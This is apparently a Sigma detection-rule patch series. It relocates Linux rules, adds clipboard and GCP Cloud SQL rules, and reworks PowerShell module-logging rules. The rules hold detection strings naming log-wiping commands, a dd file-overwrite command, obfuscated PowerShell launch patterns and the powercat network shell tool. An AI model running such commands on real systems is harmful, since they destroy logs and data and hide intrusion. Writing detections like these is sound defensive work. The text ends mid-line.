--- rules/linux/{ => process_creation}/at_command.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/linux/{ => process_creation}/at_command.yml (94%) diff --git a/rules/linux/at_command.yml b/rules/linux/process_creation/at_command.yml similarity index 94% rename from rules/linux/at_command.yml rename to rules/linux/process_creation/at_command.yml index 81e3802e..bc79120c 100644 --- a/rules/linux/at_command.yml +++ b/rules/linux/process_creation/at_command.yml @@ -11,7 +11,7 @@ logsource: category: process_creation detection: selection: - ProcessName|endswith: + Image|endswith: - '/at' - '/atd' condition: selection From eed86077abc61ab31a5b2a52044447a9de96d9e6 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 15:59:11 -0400 Subject: [PATCH 1242/1367] updated rules schema and added Clipboard Collection with Xclip Tool --- rules/linux/process_creation/clear_syslog.yml | 1 - .../process_creation/clipboard_collection.yml | 28 +++++++++++++++++++ .../process_creation/dd_file_overwrite.yml | 1 - ...omigod_scx_runasprovider_executescript.yml | 1 - ..._scx_runasprovider_executeshellcommand.yml | 1 - 5 files changed, 28 insertions(+), 4 deletions(-) create mode 100644 rules/linux/process_creation/clipboard_collection.yml diff --git a/rules/linux/process_creation/clear_syslog.yml b/rules/linux/process_creation/clear_syslog.yml index 4c57557e..6365f46a 100644 --- a/rules/linux/process_creation/clear_syslog.yml +++ b/rules/linux/process_creation/clear_syslog.yml @@ -2,7 +2,6 @@ title: Commands to Clear or Remove the Syslog id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 status: experimental description: Detects specific commands commonly used to remove or empty the syslog. -status: experimental date: 2021/10/15 author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: diff --git a/rules/linux/process_creation/clipboard_collection.yml b/rules/linux/process_creation/clipboard_collection.yml new file mode 100644 index 00000000..d45ed949 --- /dev/null +++ b/rules/linux/process_creation/clipboard_collection.yml @@ -0,0 +1,28 @@ +title: Clipboard Collection with Xclip Tool +id: ec127035-a636-4b9a-8555-0efd4e59f316 +status: experimental +description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +date: 2021/10/15 +author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.impact + - attack.t1485 +references: + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml +logsource: + product: linux + category: process_creation +detection: + selection: + Image|contains: 'xclip' + CommandLine|contains: + - '-selection' + - '-sel' + CommandLine|contains: + - 'clipboard' + - 'clip' + CommandLine|contains: '-o' + condition: selection +falsepositives: + - Legitimate usage of xclip tools. +level: low \ No newline at end of file diff --git a/rules/linux/process_creation/dd_file_overwrite.yml b/rules/linux/process_creation/dd_file_overwrite.yml index 8fe6ce2d..d318c77a 100644 --- a/rules/linux/process_creation/dd_file_overwrite.yml +++ b/rules/linux/process_creation/dd_file_overwrite.yml @@ -2,7 +2,6 @@ title: DD File Overwrite id: 2953194b-e33c-4859-b9e8-05948c167447 status: experimental description: Detects potential overwriting and deletion of a file using DD. -status: experimental date: 2021/10/15 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: diff --git a/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml b/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml index 308c92d4..573b6aef 100644 --- a/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml +++ b/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml @@ -2,7 +2,6 @@ title: OMIGOD SCX RunAsProvider ExecuteScript id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db status: experimental description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. -status: experimental date: 2021/10/15 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: diff --git a/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml b/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml index 34d3c7f3..f53b0ff6 100644 --- a/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml +++ b/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml @@ -2,7 +2,6 @@ title: OMIGOD SCX RunAsProvider ExecuteShellCommand id: 21541900-27a9-4454-9c4c-3f0a4240344a status: experimental description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. -status: experimental date: 2021/10/15 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: From d391eccd3238ee11d09627c279145dcb6fb5a533 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 16:10:42 -0400 Subject: [PATCH 1243/1367] split commandline arguments in a few rules --- rules/linux/process_creation/clipboard_collection.yml | 7 +++++-- rules/linux/process_creation/dd_file_overwrite.yml | 6 ++++-- 2 files changed, 9 insertions(+), 4 deletions(-) diff --git a/rules/linux/process_creation/clipboard_collection.yml b/rules/linux/process_creation/clipboard_collection.yml index d45ed949..1055acda 100644 --- a/rules/linux/process_creation/clipboard_collection.yml +++ b/rules/linux/process_creation/clipboard_collection.yml @@ -13,16 +13,19 @@ logsource: product: linux category: process_creation detection: - selection: + selection1: Image|contains: 'xclip' + selection2: CommandLine|contains: - '-selection' - '-sel' + selection3: CommandLine|contains: - 'clipboard' - 'clip' + selection4: CommandLine|contains: '-o' - condition: selection + condition: selection1 and selection2 and selection3 and selection4 falsepositives: - Legitimate usage of xclip tools. level: low \ No newline at end of file diff --git a/rules/linux/process_creation/dd_file_overwrite.yml b/rules/linux/process_creation/dd_file_overwrite.yml index d318c77a..36808673 100644 --- a/rules/linux/process_creation/dd_file_overwrite.yml +++ b/rules/linux/process_creation/dd_file_overwrite.yml @@ -13,13 +13,15 @@ logsource: product: linux category: process_creation detection: - selection: + selection1: Image: '/bin/dd' + selection2: CommandLine|contains: 'of=' + selection3: CommandLine|contains: - 'if=/dev/zero' - 'if=/dev/null' - condition: selection + condition: selection1 and selection2 and selection3 falsepositives: - Any user deleting files that way. level: low \ No newline at end of file From 7b11987155db37d5b69647d21cee9656f813db5d Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 16:12:51 -0400 Subject: [PATCH 1244/1367] Fixed format indentation to fix block error --- rules/linux/process_creation/clipboard_collection.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/linux/process_creation/clipboard_collection.yml b/rules/linux/process_creation/clipboard_collection.yml index 1055acda..a2d26ff3 100644 --- a/rules/linux/process_creation/clipboard_collection.yml +++ b/rules/linux/process_creation/clipboard_collection.yml @@ -13,9 +13,9 @@ logsource: product: linux category: process_creation detection: - selection1: + selection1: Image|contains: 'xclip' - selection2: + selection2: CommandLine|contains: - '-selection' - '-sel' @@ -25,7 +25,7 @@ detection: - 'clip' selection4: CommandLine|contains: '-o' - condition: selection1 and selection2 and selection3 and selection4 + condition: selection1 and selection2 and selection3 and selection4 falsepositives: - Legitimate usage of xclip tools. level: low \ No newline at end of file From 2c0e89ccc8584b59bee3ae4c8aabd2a9df87f8af Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 16:24:26 -0400 Subject: [PATCH 1245/1367] added indentation to lists per request --- rules/linux/process_creation/clear_syslog.yml | 14 +++++++------- .../process_creation/clipboard_collection.yml | 8 ++++---- rules/linux/process_creation/dd_file_overwrite.yml | 4 ++-- 3 files changed, 13 insertions(+), 13 deletions(-) diff --git a/rules/linux/process_creation/clear_syslog.yml b/rules/linux/process_creation/clear_syslog.yml index 6365f46a..44c78204 100644 --- a/rules/linux/process_creation/clear_syslog.yml +++ b/rules/linux/process_creation/clear_syslog.yml @@ -15,13 +15,13 @@ logsource: detection: selection: CommandLine|contains: - - 'rm /var/log/syslog' - - 'rm -r /var/log/syslog' - - 'rm -f /var/log/syslog' - - 'rm -rf /var/log/syslog' - - 'mv /var/log/syslog' - - ' >/var/log/syslog' - - ' > /var/log/syslog' + - 'rm /var/log/syslog' + - 'rm -r /var/log/syslog' + - 'rm -f /var/log/syslog' + - 'rm -rf /var/log/syslog' + - 'mv /var/log/syslog' + - ' >/var/log/syslog' + - ' > /var/log/syslog' condition: selection falsepositives: - Log rotation. diff --git a/rules/linux/process_creation/clipboard_collection.yml b/rules/linux/process_creation/clipboard_collection.yml index a2d26ff3..f46c302f 100644 --- a/rules/linux/process_creation/clipboard_collection.yml +++ b/rules/linux/process_creation/clipboard_collection.yml @@ -17,12 +17,12 @@ detection: Image|contains: 'xclip' selection2: CommandLine|contains: - - '-selection' - - '-sel' + - '-selection' + - '-sel' selection3: CommandLine|contains: - - 'clipboard' - - 'clip' + - 'clipboard' + - 'clip' selection4: CommandLine|contains: '-o' condition: selection1 and selection2 and selection3 and selection4 diff --git a/rules/linux/process_creation/dd_file_overwrite.yml b/rules/linux/process_creation/dd_file_overwrite.yml index 36808673..1d6e3ee1 100644 --- a/rules/linux/process_creation/dd_file_overwrite.yml +++ b/rules/linux/process_creation/dd_file_overwrite.yml @@ -19,8 +19,8 @@ detection: CommandLine|contains: 'of=' selection3: CommandLine|contains: - - 'if=/dev/zero' - - 'if=/dev/null' + - 'if=/dev/zero' + - 'if=/dev/null' condition: selection1 and selection2 and selection3 falsepositives: - Any user deleting files that way. From 7fc1c509016ae7da8b29295a56b26865a9b777ab Mon Sep 17 00:00:00 2001 From: austinsonger Date: Fri, 15 Oct 2021 18:53:45 -0500 Subject: [PATCH 1246/1367] gcp_sql_database_modified_or_deleted.yml --- .../gcp_sql_database_modified_or_deleted.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml diff --git a/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml b/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml new file mode 100644 index 00000000..ca75927f --- /dev/null +++ b/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Google Cloud SQL Database Modified or Deleted +id: f346bbd5-2c4e-4789-a221-72de7685090d +description: Detect when a Cloud SQL DB has been modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/15 +references: + - https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - cloudsql.instances.create + - cloudsql.instances.delete + - cloudsql.users.update + - cloudsql.users.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - SQL Database being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 0ca16b18f41047cdc1fa29f32239059bb6f1515b Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 16 Oct 2021 08:05:15 +0200 Subject: [PATCH 1247/1367] Change to category: ps_module --- .../powershell_alternate_powershell_hosts.yml | 5 ++--- .../powershell_module/powershell_bad_opsec_artifacts.yml | 5 ++--- .../powershell_clear_powershell_history.yml | 8 +++----- .../powershell_module/powershell_decompress_commands.yml | 5 ++--- .../powershell_module/powershell_get_clipboard.yml | 5 ++--- .../powershell_invoke_obfuscation_clip.yml | 5 ++--- .../powershell_invoke_obfuscation_obfuscated_iex.yml | 8 +++----- .../powershell_invoke_obfuscation_stdin.yml | 4 ++-- .../powershell_invoke_obfuscation_var.yml | 4 ++-- .../powershell_invoke_obfuscation_via_compress.yml | 5 ++--- .../powershell_invoke_obfuscation_via_rundll.yml | 5 ++--- .../powershell_invoke_obfuscation_via_stdin.yml | 4 ++-- .../powershell_invoke_obfuscation_via_use_clip.yml | 4 ++-- .../powershell_invoke_obfuscation_via_use_mhsta.yml | 5 ++--- .../powershell_invoke_obfuscation_via_use_rundll32.yml | 5 ++--- .../powershell_invoke_obfuscation_via_var.yml | 5 ++--- .../powershell/powershell_module/powershell_powercat.yml | 5 ++--- .../powershell_remote_powershell_session.yml | 5 ++--- .../powershell_susp_athremotefxvgpudisablementcommand.yml | 8 +++----- .../powershell_module/powershell_susp_zip_compress.yml | 5 ++--- 20 files changed, 43 insertions(+), 62 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml index 0a5dc88c..cebabac1 100644 --- a/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml @@ -3,7 +3,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2021/09/21 +modified: 2021/10/16 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -13,11 +13,10 @@ tags: - attack.t1086 # an old one logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection: - EventID: 4103 ContextInfo: '*' filter: ContextInfo|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event diff --git a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml index dc3a6cdd..b7a636ef 100644 --- a/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml +++ b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml @@ -11,18 +11,17 @@ references: - https://www.mdeditor.tw/pl/pgRt author: 'ok @securonix invrep_de, oscd.community' date: 2020/10/09 -modified: 2021/10/07 +modified: 2021/10/16 tags: - attack.execution - attack.t1059.001 - attack.t1086 # an old one logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|contains: - '$DoIt' - 'harmj0y' diff --git a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml index 46da86f6..a13453f9 100644 --- a/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml @@ -6,7 +6,7 @@ related: status: experimental description: Detects keywords that could indicate clearing PowerShell history date: 2019/10/25 -modified: 2020/11/28 +modified: 2021/10/16 author: Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community references: - https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a @@ -16,11 +16,9 @@ tags: - attack.t1146 # an old one logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: - selection_id: - EventID: 4103 selection_payload_1: Payload|contains: - 'del' @@ -33,7 +31,7 @@ detection: - 'Set-PSReadlineOption' - '–HistorySaveStyle' - 'SaveNothing' - condition: selection_id and ( selection_payload_1 or selection_payload_2 ) + condition: selection_payload_1 or selection_payload_2 falsepositives: - Legitimate PowerShell scripts level: medium diff --git a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml index 5107fd70..6429b550 100644 --- a/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml @@ -6,7 +6,7 @@ related: description: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files. status: experimental date: 2020/05/02 -modified: 2021/10/07 +modified: 2021/10/16 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.defense_evasion @@ -16,11 +16,10 @@ references: - https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|contains: 'Expand-Archive' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml index 832dab3d..65e81751 100644 --- a/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml @@ -6,7 +6,7 @@ related: description: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents. status: experimental date: 2020/05/02 -modified: 2021/10/07 +modified: 2021/10/16 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.collection @@ -16,11 +16,10 @@ references: - https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|contains: 'Get-Clipboard' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml index 98a298b6..73f8b09f 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/13 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) tags: @@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml index e00f05f9..6e6f969b 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -7,7 +7,7 @@ description: "Detects all variations of obfuscated powershell IEX invocation cod status: experimental author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community date: 2019/11/08 -modified: 2021/10/07 +modified: 2021/10/16 tags: - attack.defense_evasion - attack.t1027 @@ -16,11 +16,9 @@ tags: - attack.t1086 #an old one logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: - selection_id: - EventID: 4103 selection_payload: - Payload|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - Payload|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' @@ -29,7 +27,7 @@ detection: - Payload|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - Payload|re: '\$VerbosePreference\.ToString\(' - Payload|re: '\String\]\s*\$VerbosePreference' - condition: selection_id and selection_payload + condition: selection_payload falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml index ff0cda53..483b4c34 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml @@ -7,6 +7,7 @@ description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) tags: @@ -16,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml index f85198cc..91aec4b6 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml @@ -7,6 +7,7 @@ description: Detects Obfuscated use of Environment Variables to execute PowerShe status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) tags: @@ -16,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml index 1ba4b73e..43ca7ebd 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) tags: @@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml index ccbd2b9a..bde55696 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_rundll.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) tags: @@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml index d5715369..1bd27a93 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_stdin.yml @@ -7,6 +7,7 @@ description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/12 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) tags: @@ -16,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml index 3c823c36..ddfa4f24 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_clip.yml @@ -7,6 +7,7 @@ description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) tags: @@ -16,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml index 791c900b..eb78f9ac 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/08 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) tags: @@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabledd detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml index 3c12fe92..a30dd2cc 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2019/10/08 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 tags: @@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml index 2b78501f..ddd02c3d 100644 --- a/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_var.yml @@ -7,7 +7,7 @@ description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/13 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) tags: @@ -17,11 +17,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabledd detection: selection_4103: - EventID: 4103 Payload|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r condition: selection_4103 falsepositives: diff --git a/rules/windows/powershell/powershell_module/powershell_powercat.yml b/rules/windows/powershell/powershell_module/powershell_powercat.yml index 649381c9..ef9261ca 100644 --- a/rules/windows/powershell/powershell_module/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_module/powershell_powercat.yml @@ -3,7 +3,7 @@ id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 status: experimental author: frack113 date: 2021/07/21 -modified: 2021/09/07 +modified: 2021/10/16 description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ @@ -14,11 +14,10 @@ tags: - attack.t1095 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection: - EventID: 4103 ContextInfo|contains: - 'powercat ' - 'powercat.ps1' diff --git a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml index 4bd6369c..ba800a5b 100644 --- a/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_module/powershell_remote_powershell_session.yml @@ -3,7 +3,7 @@ id: 96b9f619-aa91-478f-bacb-c3e50f8df575 description: Detects remote PowerShell sessions status: test date: 2019/08/10 -modified: 2021/09/21 +modified: 2021/10/16 author: Roberto 